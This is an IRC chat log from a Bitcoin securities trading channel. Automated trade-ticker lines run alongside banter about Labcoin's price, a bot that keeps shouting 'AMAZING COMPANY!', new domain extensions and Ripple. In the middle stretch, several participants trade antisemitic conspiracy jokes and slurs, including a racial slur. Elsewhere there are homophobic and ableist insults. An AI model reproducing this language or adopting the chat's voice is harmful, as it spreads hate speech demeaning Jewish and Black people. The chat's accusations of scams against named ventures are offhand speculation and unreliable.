02:49:42 [BTCTC] [LABCOIN] 1 @ 0.003094 BTC [+] Sep 16 02:49:44 what??? Sep 16 02:49:51 baha Sep 16 02:49:59 [MPEX] [S.MPOE] 12250 @ 0.00090351 = 11.068 BTC [+] Sep 16 02:50:03 yes moar plz Sep 16 02:50:14 [BTCTC] [LABCOIN] 18 @ 0.003043 = 0.0548 BTC [-] Sep 16 02:50:15 the reference full node implementation is *always* the most popular one in the economic majority Sep 16 02:50:17 [BTCTC] [LABCOIN] 2 @ 0.003094 = 0.0062 BTC [+] Sep 16 02:50:22 you can't just say "*this* is the reference code" Sep 16 02:50:57 i cant even... Sep 16 02:50:58 again that's not quite what was said. Sep 16 02:51:22 that's what it sounded like to me Sep 16 02:51:30 [BTCTC] [DMS.MINING] 50 @ 0.002395 = 0.1198 BTC [-] Sep 16 02:51:45 but when you just say an adjective-noun pair, you force everyone listening to infer the verb etc Sep 16 02:52:32 [BTCTC] [LABCOIN] 19 @ 0.002998 = 0.057 BTC [-] Sep 16 02:52:34 [BTCTC] [LABCOIN] 70 @ 0.002998 = 0.2099 BTC [-] Sep 16 02:52:35 [BTCTC] [LABCOIN] 585 @ 0.002904 = 1.6988 BTC [-] Sep 16 02:52:36 [BTCTC] [LABCOIN] 58 @ 0.002902 = 0.1683 BTC [-] Sep 16 02:52:57 two words Sep 16 02:53:01 [BTCTC] [DMS.MINING] 100 @ 0.002399 = 0.2399 BTC [+] Sep 16 02:53:13 AMAZING COMPANY? Sep 16 02:53:13 AMAZING COMPANY! Sep 16 02:53:16 lmaio Sep 16 02:53:19 :) Sep 16 02:53:34 ftfy: amazing foundation Sep 16 02:53:35 AMAZING COMPANY! Sep 16 02:53:35 The hell, assbot? Sep 16 02:53:38 this is officially a meme by now isnt it Sep 16 02:53:56 Where is that from? Sep 16 02:54:13 from the Finance Foundation. Sep 16 02:54:15 labcoin socks Sep 16 02:54:25 it's this thing on the forum where people vote for shit and boards and i don't recall wehat else. Sep 16 02:54:31 o yes. topics, issues and debates. Sep 16 02:54:31 Finance Foundation? Sep 16 02:54:35 yeah. Sep 16 02:54:40 [BTCTC] [LABCOIN] 225 @ 0.002881 = 0.6482 BTC [-] Sep 16 02:55:02 I just GOT to see that. Link please? Sep 16 02:55:09 is this channel the Bitcoin Finance Foundation? Sep 16 02:55:15 wow seriously? Sep 16 02:55:32 The BFF! Sep 16 02:55:36 well, seriously quite to the degree all the rest of the shit is, so... Sep 16 02:55:41 sorta. Sep 16 02:56:00 moar like butt fucker foundation Sep 16 02:56:17 don't project your minority sexual inclinations on me dubby. Sep 16 02:56:36 and btw, all the retards raging about how bitcoin is a currency : Sep 16 02:56:46 at most a trollency it is. there's no curs in bitcoin. Sep 16 02:57:32 [BTCTC] [LABCOIN] 19 @ 0.002955 = 0.0561 BTC [+] Sep 16 02:57:33 [BTCTC] [LABCOIN] 29 @ 0.002882 = 0.0836 BTC [-] Sep 16 02:58:03 so you admit it's a ponzi?! Sep 16 02:58:16 shhhhhh Sep 16 02:58:28 [BTCTC] [BASIC-MINING] 1 @ 0.1187 BTC [-] Sep 16 02:58:28 um... social security is a ponzi. not related. Sep 16 02:58:28 [BTCTC] [BASIC-MINING] 6 @ 0.1186 = 0.7116 BTC [-] Sep 16 02:58:29 [BTCTC] [BASIC-MINING] 2 @ 0.1185 = 0.237 BTC [-] Sep 16 02:58:30 [BTCTC] [BASIC-MINING] 2 @ 0.1182 = 0.2364 BTC [-] Sep 16 02:58:31 [BTCTC] [BASIC-MINING] 1 @ 0.118 BTC [-] Sep 16 02:58:32 [BTCTC] [BASIC-MINING] 1 @ 0.1172 BTC [-] Sep 16 02:58:33 [BTCTC] [BASIC-MINING] 1 @ 0.1171 BTC [-] Sep 16 02:58:34 [BTCTC] [BASIC-MINING] 5 @ 0.117 = 0.585 BTC [-] Sep 16 02:58:35 [BTCTC] [BASIC-MINING] 1 @ 0.1162 BTC [-] Sep 16 02:58:36 [BTCTC] [BASIC-MINING] 1 @ 0.1161 BTC [-] Sep 16 02:58:38 [BTCTC] [BASIC-MINING] 5 @ 0.116 = 0.58 BTC [-] Sep 16 02:58:39 [BTCTC] [BASIC-MINING] 1 @ 0.1119 BTC [-] Sep 16 02:58:39 [BTCTC] [BASIC-MINING] 6 @ 0.1118 = 0.6708 BTC [-] Sep 16 02:58:40 [BTCTC] [BASIC-MINING] 4 @ 0.1112 = 0.4448 BTC [-] Sep 16 02:58:41 [BTCTC] [BASIC-MINING] 100 @ 0.1111 = 11.11 BTC [-] Sep 16 02:58:42 [BTCTC] [BASIC-MINING] 1 @ 0.11 BTC [-] Sep 16 02:58:43 [BTCTC] [BASIC-MINING] 6 @ 0.11 = 0.66 BTC [-] Sep 16 02:59:05 there goes my kids' college fund Sep 16 02:59:32 american college Sep 16 02:59:44 it's a lulzy thing. Sep 16 02:59:47 amazing parties! Sep 16 02:59:47 AMAZING COMPANY! Sep 16 02:59:49 ha! Sep 16 02:59:53 amazing college! Sep 16 02:59:54 AMAZING COMPANY! Sep 16 02:59:57 learn to touch type, assbot. reeses can teach you. Sep 16 03:00:01 Unit University Sep 16 03:00:09 Amazing Degrees Sep 16 03:00:09 AMAZING COMPANY! Sep 16 03:00:10 amazing assbot! Sep 16 03:00:11 AMAZING COMPANY! Sep 16 03:00:12 Photos in 2 weeks! Sep 16 03:00:15 i see.. :> Sep 16 03:00:18 amazing photos Sep 16 03:00:19 AMAZING COMPANY! Sep 16 03:00:29 hey assbot Sep 16 03:00:31 is it amazing? Sep 16 03:00:37 amazin! Sep 16 03:00:37 ha guess not Sep 16 03:00:40 *amazing! Sep 16 03:00:41 ;;echo amazing assbot Sep 16 03:00:42 amazing assbot Sep 16 03:00:42 AMAZING COMPANY! Sep 16 03:00:42 AMAZING COMPANY! Sep 16 03:00:48 What? We can't say amazing anymore without assbot going haywire? Sep 16 03:00:48 AMAZING COMPANY! Sep 16 03:00:51 [BTCTC] [LABCOIN] 19 @ 0.002914 = 0.0554 BTC [+] Sep 16 03:00:53 [BTCTC] [LABCOIN] 1 @ 0.00288 BTC [-] Sep 16 03:00:54 [BTCTC] [LABCOIN] 18 @ 0.002879 = 0.0518 BTC [-] Sep 16 03:00:55 [BTCTC] [LABCOIN] 5 @ 0.002871 = 0.0144 BTC [-] Sep 16 03:00:56 [BTCTC] [LABCOIN] 50 @ 0.00287 = 0.1435 BTC [-] Sep 16 03:00:56 [BTCTC] [LABCOIN] 492 @ 0.002843 = 1.3988 BTC [-] Sep 16 03:00:57 [BTCTC] [LABCOIN] 10 @ 0.002839 = 0.0284 BTC [-] Sep 16 03:00:58 [BTCTC] [LABCOIN] 100 @ 0.002838 = 0.2838 BTC [-] Sep 16 03:00:59 [BTCTC] [LABCOIN] 3 @ 0.002836 = 0.0085 BTC [-] Sep 16 03:01:00 [BTCTC] [LABCOIN] 19 @ 0.002835 = 0.0539 BTC [-] Sep 16 03:01:01 [BTCTC] [LABCOIN] 19 @ 0.002833 = 0.0538 BTC [-] Sep 16 03:01:02 [BTCTC] [LABCOIN] 59 @ 0.002833 = 0.1671 BTC [-] Sep 16 03:01:03 [BTCTC] [LABCOIN] 98 @ 0.002832 = 0.2775 BTC [-] Sep 16 03:01:04 [BTCTC] [LABCOIN] 54 @ 0.002829 = 0.1528 BTC [-] Sep 16 03:01:05 [BTCTC] [LABCOIN] 19 @ 0.002828 = 0.0537 BTC [-] Sep 16 03:01:06 [BTCTC] [LABCOIN] 526 @ 0.002826 = 1.4865 BTC [-] Sep 16 03:01:06 [BTCTC] [LABCOIN] 9 @ 0.002811 = 0.0253 BTC [-] Sep 16 03:01:07 [BTCTC] [LABCOIN] 98 @ 0.00281 = 0.2754 BTC [-] Sep 16 03:01:08 [BTCTC] [LABCOIN] 15 @ 0.002801 = 0.042 BTC [-] Sep 16 03:01:09 [BTCTC] [LABCOIN] 150 @ 0.0028 = 0.42 BTC [-] Sep 16 03:01:10 [BTCTC] [LABCOIN] 9 @ 0.002789 = 0.0251 BTC [-] Sep 16 03:01:11 [BTCTC] [LABCOIN] 99 @ 0.002788 = 0.276 BTC [-] Sep 16 03:01:12 [BTCTC] [LABCOIN] 180 @ 0.002771 = 0.4988 BTC [-] Sep 16 03:01:13 [BTCTC] [LABCOIN] 448 @ 0.00277 = 1.241 BTC [-] Sep 16 03:01:22 Why was labcoin near 0.003? Sep 16 03:01:28 because Sep 16 03:01:30 amazing Sep 16 03:01:31 moonbeams Sep 16 03:01:32 AMAZING COMPANY! Sep 16 03:01:38 they promised mining address on wednesday Sep 16 03:01:45 before* wednesday Sep 16 03:01:52 People, I'm very disappointed in you. Sep 16 03:01:56 "can i have some amazement today for which i will gladly pay wednesday ?" Sep 16 03:01:58 [BTCTC] [LABCOIN] 175 @ 0.002773 = 0.4853 BTC [+] Sep 16 03:01:59 [BTCTC] [LABCOIN] 403 @ 0.002772 = 1.1171 BTC [-] Sep 16 03:02:00 [BTCTC] [LABCOIN] 503 @ 0.00277 = 1.3933 BTC [-] Sep 16 03:02:25 who runs assbot? Sep 16 03:02:31 assbot Sep 16 03:02:36 The Bitcoin Foundation Sep 16 03:02:38 is there a way to sum a block of trades? Sep 16 03:02:53 i think this might be useful Sep 16 03:02:54 the assbot foundation Sep 16 03:02:56 a calculator Sep 16 03:02:57 dexX7 yes, by addition, but he's been too lazy to do that for about two years now Sep 16 03:03:09 ;;google assboat Sep 16 03:03:10 The Assboat - Something Awful: ; Bad Ass Boat - YouTube: ; Bad ass Boat - YouTube: Sep 16 03:04:00 yessss let's do assbot foundation Sep 16 03:04:24 jurov we could have a bunch of pics mooning the cam Sep 16 03:04:26 I guess it might cool if assbot printed a sum of any trades on a asset occurring successively Sep 16 03:04:54 we could use more spam in here at least Sep 16 03:05:18 [BTCTC] [LABCOIN] 77 @ 0.00296 = 0.2279 BTC [+] Sep 16 03:05:19 [BTCTC] [LABCOIN] 23 @ 0.002961 = 0.0681 BTC [+] Sep 16 03:05:57 most useful would be if assbot printed future trades in advance Sep 16 03:06:04 5 minutes would be okay Sep 16 03:06:11 would it be though? Sep 16 03:06:28 that's like saying arb would be so much easier if there were no obstacles Sep 16 03:06:31 [BTCTC] [BASIC-MINING] 9 @ 0.1085 = 0.9765 BTC [-] Sep 16 03:06:55 yes it would be easy. everyone'd know what to do Sep 16 03:07:02 well on some stocks it would perhaps be doable, especially if you people were nicer to ken Sep 16 03:07:09 and that other guy with the face, what's his name. Sep 16 03:07:28 Kate Sep 16 03:07:39 a yes. kate. Sep 16 03:07:50 To add plausibility to this representation and to allay anxiety about future pricing, SG published prices of the privileged company's shares one month in advance. Sep 16 03:08:09 i obviously mean s/privileged/amazing Sep 16 03:08:33 whats the name of that thing that called itself a stock trading game? i forget Sep 16 03:08:48 something generic Sep 16 03:08:57 picobutt-tc Sep 16 03:09:06 no it was like a court case IRL etc Sep 16 03:09:08 [BTCTC] [LABCOIN] 2 @ 0.002837 = 0.0057 BTC [-] Sep 16 03:09:12 you mean stock generation, from whence the quote ? Sep 16 03:09:18 yes ok Sep 16 03:09:27 wasnt sure Sep 16 03:09:51 wow Sep 16 03:09:56 never heard of it Sep 16 03:10:22 bucket shop? Sep 16 03:10:49 [BTCTC] [DMS.SELLING] 9 @ 0.0069 = 0.0621 BTC [-] Sep 16 03:10:58 dexX7 what, seriously ?! Sep 16 03:11:04 ponzi scheme Sep 16 03:11:04 http://en.wikipedia.org/wiki/Stock_Generation Sep 16 03:11:11 [HAVELOCK] [DEALCO] 4 @ 0.00800011 = 0.032 BTC [-] Sep 16 03:11:11 but the similarities ... oh well Sep 16 03:11:30 [HAVELOCK] [DEALCO] 257 @ 0.00800001 = 2.056 BTC [-] Sep 16 03:11:43 [BTCTC] [LABCOIN] 18 @ 0.002837 = 0.0511 BTC [-] Sep 16 03:12:37 http://www.en.kolobok.us/smiles/personal/rabbi.gif Sep 16 03:13:27 um Sep 16 03:14:14 [BTCTC] [BASIC-MINING] 1 @ 0.1039 BTC [-] Sep 16 03:14:44 http://www.youtube.com/watch?v=Lzx7M7JnVyw Sep 16 03:14:45 Seinfeld - Kramer you're crazy - YouTube Sep 16 03:14:46 there, first thing Sep 16 03:15:14 that's a jew thing? Sep 16 03:15:19 [HAVELOCK] [AM100] 1 @ 0.02014 BTC [-] Sep 16 03:15:23 yes it's a jew thing. Sep 16 03:15:28 i see. Sep 16 03:15:49 then again everything is a jew thing so i gues goyim may be excused from not knowing >D Sep 16 03:16:11 >D Sep 16 03:16:13 i like that one Sep 16 03:16:28 >D Sep 16 03:17:32 i only ever knew like 2 jews Sep 16 03:17:41 aren;'t you in like, america ? Sep 16 03:17:45 i'm from a densely catholic area Sep 16 03:17:56 portuguese Sep 16 03:18:04 but yes american Sep 16 03:18:22 that's what they want you to think. why just last week i read on the information superhighway that the damend jews have taken over all the united states government. Sep 16 03:18:29 all the way down to the postmaster general. Sep 16 03:18:50 the news is out! Sep 16 03:18:53 well i hail from Massachusetts Sep 16 03:18:55 [BTCTC] [LABCOIN] 20 @ 0.002821 = 0.0564 BTC [-] Sep 16 03:18:56 the cassocks are coming! Sep 16 03:19:02 WARN THE TRIBES Sep 16 03:20:01 jews dont make it that far east i guess Sep 16 03:20:20 haha Sep 16 03:20:24 [BTCTC] [LABCOIN] 20 @ 0.002864 = 0.0573 BTC [+] Sep 16 03:20:25 :) Sep 16 03:22:39 yea these filthy socialist jews Sep 16 03:22:46 xD Sep 16 03:23:04 quite fucking reptillian. Sep 16 03:23:07 [BTCTC] [TAT.ASICMINER] 30 @ 0.01969 = 0.5907 BTC [+] Sep 16 03:23:13 [BTCTC] [LABCOIN] 357 @ 0.002802 = 1.0003 BTC [-] Sep 16 03:23:27 illjewminati Sep 16 03:23:34 jew niggers Sep 16 03:23:40 =D Sep 16 03:24:11 illjewminati is pretty good Sep 16 03:24:17 so many portmanteaus in one. Sep 16 03:24:27 heh, someone has the twitter name already Sep 16 03:24:28 https://twitter.com/Illjewminati Sep 16 03:24:32 Illjewminati (Illjewminati) on Twitter Sep 16 03:25:16 [BTCTC] [LABCOIN] 364 @ 0.002824 = 1.0279 BTC [+] Sep 16 03:25:28 you could make it illjewminetti, then it'd include finetti too which is always nice to have. Sep 16 03:26:02 [BTCTC] [LABCOIN] 182 @ 0.002825 = 0.5142 BTC [+] Sep 16 03:26:15 [BTCTC] [ACTIVEMINING] 4 @ 0.00273 = 0.0109 BTC [+] Sep 16 03:26:31 is that like Jew Nutella? Sep 16 03:26:59 it's some very cheap portuguese i think Sep 16 03:27:07 hazelnut spread. Sep 16 03:27:12 [BTCTC] [LABCOIN] 146 @ 0.002824 = 0.4123 BTC [-] Sep 16 03:28:02 you sur eit's portuguese? Sep 16 03:28:16 like one of the only euro countries not listed on the brand site Sep 16 03:28:47 Chipita operates production facilities in 6 countries, namely Greece, Bulgaria, Romania, Poland, Russia and USA, occupying 62 production lines. The company holds strong Joint Venture businesses in Saudi Arabia, Mexico and Nigeria through strategic partnerships. Sep 16 03:30:13 actgually turns out its greek Sep 16 03:30:27 [BTCTC] [BASIC-MINING] 1 @ 0.1078 BTC [+] Sep 16 03:30:30 maybe i'll get some when i'm in Cyprus Sep 16 03:30:32 a well, til. Sep 16 03:32:13 [BTCTC] [DMS.MINING] 24 @ 0.002424 = 0.0582 BTC [+] Sep 16 03:32:14 [BTCTC] [DMS.MINING] 389 @ 0.002424 = 0.9429 BTC [+] Sep 16 03:32:15 [BTCTC] [DMS.MINING] 413 @ 0.002424 = 1.0011 BTC [+] Sep 16 03:32:16 [BTCTC] [DMS.MINING] 49 @ 0.002429 = 0.119 BTC [+] Sep 16 03:32:17 [BTCTC] [DMS.MINING] 49 @ 0.002439 = 0.1195 BTC [+] Sep 16 03:32:49 [BTCTC] [DMS.MINING] 49 @ 0.002449 = 0.12 BTC [+] Sep 16 03:32:50 [BTCTC] [DMS.MINING] 389 @ 0.002474 = 0.9624 BTC [+] Sep 16 03:32:51 [BTCTC] [DMS.MINING] 5 @ 0.002478 = 0.0124 BTC [+] Sep 16 03:32:52 [BTCTC] [DMS.MINING] 280 @ 0.002496 = 0.6989 BTC [+] Sep 16 03:32:53 [BTCTC] [DMS.MINING] 143 @ 0.002499 = 0.3574 BTC [+] Sep 16 03:32:54 [BTCTC] [DMS.MINING] 611 @ 0.0025 = 1.5275 BTC [+] Sep 16 03:33:23 not sure why i never asked this before, why does bitbet have a .us ? Sep 16 03:33:32 option pricing on mining operations has to include div payouts Sep 16 03:33:36 *instant migrane* Sep 16 03:33:37 [BTCTC] [BASIC-MINING] 7 @ 0.1074 = 0.7518 BTC [-] Sep 16 03:33:38 [BTCTC] [BASIC-MINING] 13 @ 0.1075 = 1.3975 BTC [+] Sep 16 03:33:51 [BTCTC] [DMS.MINING] 25 @ 0.002496 = 0.0624 BTC [-] Sep 16 03:35:30 cuz .com was taken? Sep 16 03:36:06 as was .countryoforigin? Sep 16 03:36:22 bitbet.si ? uncool Sep 16 03:36:31 uncooler than .us? Sep 16 03:36:41 us is people Sep 16 03:36:55 si is yes Sep 16 03:36:58 I like .in Sep 16 03:37:05 i like .pro Sep 16 03:37:09 so underutilized Sep 16 03:37:23 .biz is utilized mostly by spammers Sep 16 03:37:25 [MPEX] [S.MPOE] 2150 @ 0.00090351 = 1.9425 BTC [+] Sep 16 03:37:26 [MPEX] [S.MPOE] 14168 @ 0.00090725 = 12.8539 BTC [+] Sep 16 03:37:28 is .pro expensive? Sep 16 03:37:32 a little more Sep 16 03:37:33 yes Sep 16 03:37:38 like $35? Sep 16 03:37:57 the only .pro domain I know is goatse.pro (which ironically is really NSFW) Sep 16 03:37:59 [BTCTC] [ACTIVEMINING] 320 @ 0.00273 = 0.8736 BTC [+] Sep 16 03:38:34 it was started for licensed professionals, Sep 16 03:38:42 but didnt quite take off in that regard, Sep 16 03:38:50 so now all you really need is any business license Sep 16 03:38:56 ThickAsThieves: you have seen the newly approved TLDs? Sep 16 03:39:04 ive seen some Sep 16 03:39:42 incl. such mostrosities as .vermögensberatung Sep 16 03:40:25 wtf Sep 16 03:41:05 [HAVELOCK] [XBOND] 1 @ 0.00118999 BTC [-] Sep 16 03:41:27 https://gtldresult.icann.org/application-result/applicationstatus Sep 16 03:42:31 man there are so many Sep 16 03:42:34 CIALIS Sep 16 03:42:49 for cialis.cialis? Sep 16 03:43:22 so every major brand bought one it seems Sep 16 03:44:09 [BTCTC] [DMS.MINING] 269 @ 0.002491 = 0.6701 BTC [-] Sep 16 03:44:10 [BTCTC] [DMS.MINING] 80 @ 0.002495 = 0.1996 BTC [+] Sep 16 03:44:22 I used the pre-registration feature of OVH but I doubt it will be of any use Sep 16 03:44:23 icann Sep 16 03:44:24 [BTCTC] [DMS.MINING] 151 @ 0.002495 = 0.3767 BTC [+] Sep 16 03:44:34 ANTIVIRUS Symantec Corporation Sep 16 03:44:36 at that point it just seems to be a way to get more money Sep 16 03:44:37 great... Sep 16 03:44:46 amazing icann Sep 16 03:44:47 AMAZING COMPANY! Sep 16 03:44:51 lol Sep 16 03:46:20 I think I have seen .money and .finance Sep 16 03:47:07 there is .WTF Sep 16 03:47:10 whos gonna shell a mio for .btc Sep 16 03:47:32 .RIP - United TLD Holdco Ltd. Sep 16 03:48:49 amazon is asking for a lot of things Sep 16 03:48:50 maybe i should do an IPO for a TLD squatting comoany Sep 16 03:48:51 .mail .music Sep 16 03:49:19 [BTCTC] [BASIC-MINING] 10 @ 0.1049 = 1.049 BTC [-] Sep 16 03:49:59 ThickAsThieves to show people they're being retarded ? Sep 16 03:50:07 why namecoin won't claim .bit? Sep 16 03:50:27 isnt that what IPOs are for? Sep 16 03:50:28 :) Sep 16 03:50:31 lol Sep 16 03:50:40 jurov: well it is likely very expensive Sep 16 03:50:46 and not sure ICANN will like namecoin Sep 16 03:50:48 anyway, for a while all the forum experts were like complaining about my us domains Sep 16 03:50:56 to the tlds i mean. Sep 16 03:51:04 .TRAVELERSINSURANCE who is going to type this… Sep 16 03:51:09 [MPEX] [S.MPOE] 1382 @ 0.00090989 = 1.2575 BTC [+] Sep 16 03:51:17 who types domains? Sep 16 03:51:21 i do. Sep 16 03:51:28 everyone thinks google is the internet Sep 16 03:51:34 and that blue E Sep 16 03:51:47 people type google in the Bing homepage Sep 16 03:51:48 the bluenternet. Sep 16 03:51:50 and then click google Sep 16 03:52:02 and then type the domain in the google Sep 16 03:52:39 there was a study of top searches on yahoo and google. google has a lot of yahoo searches and yahoo has a lot of google searches Sep 16 03:52:41 ThickAsThieves you could do an ipo to buy the .btc domain, Sep 16 03:52:46 if you gather 10k btc together that's it. Sep 16 03:52:54 then you can sell .btc domains for a fixed fee, like .1 a year Sep 16 03:53:02 [BTCTC] [LABCOIN] 20 @ 0.002817 = 0.0563 BTC [-] Sep 16 03:53:02 [BTCTC] [LABCOIN] 20 @ 0.002815 = 0.0563 BTC [-] Sep 16 03:53:04 [BTCTC] [LABCOIN] 310 @ 0.002814 = 0.8723 BTC [-] Sep 16 03:53:11 if you've sold 100k domain-years you've made back everything and tghe rest is gravy. Sep 16 03:53:50 .1 a year wont work for long Sep 16 03:53:54 hmm Sep 16 03:53:55 prolly Sep 16 03:54:21 kakobrekla : incentive rto buy more years upfrtont. Sep 16 03:54:31 you can steal a move from the mpex book, it will always be .1 Sep 16 03:54:36 the idea seems awfully susceptible to frontrunning Sep 16 03:54:38 you want .btc, pay up now, pay up more later, fu. Sep 16 03:54:38 [BTCTC] [BTC-GROWTH] 1 @ 0.1045 BTC [+] Sep 16 03:54:39 [BTCTC] [BTC-GROWTH] 1 @ 0.1046 BTC [+] Sep 16 03:54:40 [BTCTC] [BTC-GROWTH] 94 @ 0.1048 = 9.8512 BTC [+] Sep 16 03:54:46 ThickAsThieves theres only one .btc Sep 16 03:54:56 i gues just refund the coins if not successful Sep 16 03:55:02 of course. Sep 16 03:55:27 could make it a cryptoTLD fund Sep 16 03:55:36 stretch goals like .ltc Sep 16 03:56:15 https://bitcointalk.org/index.php?topic=294856.0 Sep 16 03:56:20 Ripple XRP to go open source on Sept 26 Sep 16 03:56:32 how many fucks will be given? Sep 16 03:56:49 [BTCTC] [LABCOIN] 20 @ 0.002814 = 0.0563 BTC [-] Sep 16 03:56:50 [BTCTC] [LABCOIN] 20 @ 0.002812 = 0.0562 BTC [-] Sep 16 03:56:52 [BTCTC] [LABCOIN] 40 @ 0.0028 = 0.112 BTC [-] Sep 16 03:56:53 [BTCTC] [LABCOIN] 257 @ 0.002797 = 0.7188 BTC [-] Sep 16 03:56:54 [BTCTC] [LABCOIN] 281 @ 0.00279 = 0.784 BTC [-] Sep 16 03:56:55 [BTCTC] [LABCOIN] 314 @ 0.002785 = 0.8745 BTC [-] Sep 16 03:56:56 i'm searching the thread for one now TaT :P Sep 16 03:56:57 [BTCTC] [LABCOIN] 295 @ 0.00278 = 0.8201 BTC [-] Sep 16 03:57:17 [BTCTC] [LABCOIN] 20 @ 0.00278 = 0.0556 BTC [-] Sep 16 03:57:19 [BTCTC] [LABCOIN] 281 @ 0.002768 = 0.7778 BTC [-] Sep 16 03:57:20 [BTCTC] [LABCOIN] 23 @ 0.002751 = 0.0633 BTC [-] Sep 16 03:57:21 [BTCTC] [LABCOIN] 249 @ 0.002745 = 0.6835 BTC [-] Sep 16 03:57:22 [BTCTC] [LABCOIN] 23 @ 0.002744 = 0.0631 BTC [-] Sep 16 03:57:24 [BTCTC] [LABCOIN] 73 @ 0.002726 = 0.199 BTC [-] Sep 16 03:57:29 so the ripple pre-miners are open the community will do the work for them? Sep 16 03:57:31 [BTCTC] [LABCOIN] 97 @ 0.002726 = 0.2644 BTC [-] Sep 16 03:57:35 hoping Sep 16 03:57:35 ripple has some good ideas Sep 16 03:57:42 xrps certainly isn't one Sep 16 03:57:45 [BTCTC] [LABCOIN] 249 @ 0.002726 = 0.6788 BTC [-] Sep 16 03:57:54 [BTCTC] [LABCOIN] 249 @ 0.002726 = 0.6788 BTC [-] Sep 16 03:57:56 i typed open instead of hoping wtf is wrong with my brain? Sep 16 03:57:56 [BTCTC] [LABCOIN] 200 @ 0.002726 = 0.5452 BTC [-] Sep 16 03:57:56 I wonder why no one makes a real alternative Sep 16 03:58:08 it's a poet in there? Sep 16 03:58:08 [BTCTC] [LABCOIN] 73 @ 0.002725 = 0.1989 BTC [-] Sep 16 03:58:16 rs is still deving microcrash Sep 16 03:58:30 well there's still the colored coins idea Sep 16 03:58:31 [BTCTC] [LABCOIN] 177 @ 0.002727 = 0.4827 BTC [+] Sep 16 03:58:32 [BTCTC] [LABCOIN] 456 @ 0.002725 = 1.2426 BTC [-] Sep 16 03:58:41 pankkake because it's not such a good idea. Sep 16 03:58:44 ^ Sep 16 03:58:45 [BTCTC] [LABCOIN] 70 @ 0.002729 = 0.191 BTC [+] Sep 16 03:59:22 does Bing have a search trend tool? Sep 16 03:59:33 i tried binging it Sep 16 03:59:35 no because it kept saying google. Sep 16 03:59:36 well I haven't looked much into it Sep 16 03:59:54 but being able to trade things issued by an entity is interesting Sep 16 04:00:21 [BTCTC] [LABCOIN] 21 @ 0.002801 = 0.0588 BTC [+] Sep 16 04:00:26 i like having exchanges Sep 16 04:00:28 [BTCTC] [LABCOIN] 30 @ 0.00283 = 0.0849 BTC [+] Sep 16 04:00:49 the system helps to align interests Sep 16 04:01:13 labcoin is the funniest exercise in pushing the shit uphill this chan has yet witnessed. Sep 16 04:01:30 sure… but with ripple-like systems you can trade "gold in XX's vault" for "gold in YY's vault" Sep 16 04:01:44 i dont even really understand how so much labcoin can be traded every day Sep 16 04:01:59 [BTCTC] [LABCOIN] 220 @ 0.00283 = 0.6226 BTC [+] Sep 16 04:02:03 labcoin team might be a big part of the traders? Sep 16 04:02:14 not with their shares necessarily Sep 16 04:02:32 i think that's a reasonable conclusion pankkake Sep 16 04:02:35 but the waves are so deep, so much money to be lost Sep 16 04:03:13 are they assembling a chorus of day traders to leave holding the bag someday? Sep 16 04:03:40 you think they are that smart? Sep 16 04:03:43 no Sep 16 04:03:46 thats why i dont get it Sep 16 04:03:59 me neither tbh Sep 16 04:04:22 musical derps Sep 16 04:04:26 lol Sep 16 04:04:26 there's also the guys who invest without looking into what they invest Sep 16 04:04:32 nah Sep 16 04:04:35 this is over by now Sep 16 04:04:51 its not like we get tons of new coins put into the market Sep 16 04:04:53 well let's think about it. the down pressure recently was people going out, right ? it wasn't the team shittuing its own scam. Sep 16 04:04:54 http://www.reddit.com/r/BitcoinStocks/comments/1m38ju/am_i_missing_any_btc_stocks_in_my_portfolios/ Sep 16 04:04:55 kinda the opposite Sep 16 04:04:57 Am i missing any BTC stocks in my portfolios? : BitcoinStocks Sep 16 04:05:00 as people went out, fewer people were left in Sep 16 04:05:05 yup true. everyone who's trading this knows what he is doing. or let's say at least aware of what's happening on the forums Sep 16 04:05:12 as very few people are left in you can put the price way up, because there's nobody to sell Sep 16 04:05:17 The Noah Portfolio Sep 16 04:05:32 so basically they have a 99.9x% househeld asset now, which can in principle go to any price, like .1 Sep 16 04:05:38 [BTCTC] [LABCOIN] 699 @ 0.002829 = 1.9775 BTC [-] Sep 16 04:05:39 [BTCTC] [LABCOIN] 301 @ 0.002831 = 0.8521 BTC [+] Sep 16 04:05:40 then the ycan go "see, it REALLY was for real" Sep 16 04:05:44 maybe some bagholders buy. Sep 16 04:06:12 so this is your theory as likely the case? Sep 16 04:06:37 pretty much. Sep 16 04:07:03 so you're saying i should buy and hold? :P Sep 16 04:07:08 that thread still gets like 30 pages of posts a day or somesuch no? Sep 16 04:07:08 course, things change, not least of all because i keep talking here :D Sep 16 04:07:22 ThickAsThieves i'd imagine those'd be prepaid. Sep 16 04:07:54 Duffer1 as you buy in the likeliness of it actually going up goes down, you're basically ballast for its dreams. Sep 16 04:08:00 [BTCTC] [DMS.MINING] 10 @ 0.002495 = 0.025 BTC [+] Sep 16 04:09:23 but any way you figure it, the team is currently in the red. Sep 16 04:09:37 which means it has a finite lifespan as they don't have infinite bankroll. Sep 16 04:10:12 i think, at best, this will play out sorta like BFL Sep 16 04:10:32 where they eek out developments about 50x slower than they predict Sep 16 04:10:38 well fi nobody buys into it much it will continue to pretend indefinitely on no volumne, sorta like icbit.se Sep 16 04:10:46 if a bunch of nuts buy in then it's likely to pop Sep 16 04:11:08 [BTCTC] [LABCOIN] 290 @ 0.002819 = 0.8175 BTC [-] Sep 16 04:11:28 developments, like what ? Sep 16 04:11:34 well the latest news was pretty clear: mining address on wed, there is not much room for fuzzy stuff they could pull Sep 16 04:11:43 [BTCTC] [ACTIVEMINING] 5 @ 0.002734 = 0.0137 BTC [+] Sep 16 04:11:54 [BTCTC] [LABCOIN] 21 @ 0.002779 = 0.0584 BTC [-] Sep 16 04:11:57 [BTCTC] [LABCOIN] 179 @ 0.002779 = 0.4974 BTC [-] Sep 16 04:12:04 labcoin's only interest was to have chips soon Sep 16 04:12:09 [MPEX] [S.MPOE] 5236 @ 0.00090503 = 4.7387 BTC [-] Sep 16 04:12:10 before wednesday dex Sep 16 04:12:11 they don't, game over Sep 16 04:12:11 [BTCTC] [BTC-GROWTH] 5 @ 0.1048 = 0.524 BTC [+] Sep 16 04:12:13 oh dispite the "here is a random address, we don't have proof that we are the owner" card Sep 16 04:12:13 like we haz chips! oh wait they dont hash! we haz hashes, oh wait it takes jet fuel and nuclear reactor for energy! Sep 16 04:12:23 [MPEX] [S.MPOE] 7614 @ 0.00090689 = 6.9051 BTC [+] Sep 16 04:12:27 lol Sep 16 04:12:28 their chips, if they eventually have some, will be too late Sep 16 04:12:31 https://bitcointalk.org/index.php?topic=133147.msg3140404#msg3140404 Sep 16 04:12:36 PicoStocks, bitcoin stock exchange Sep 16 04:12:44 meanwhile scam exchange decides to implement signature authentification, sort-of. Sep 16 04:13:00 all this cocksucking i have due to me. tsk tsk. Sep 16 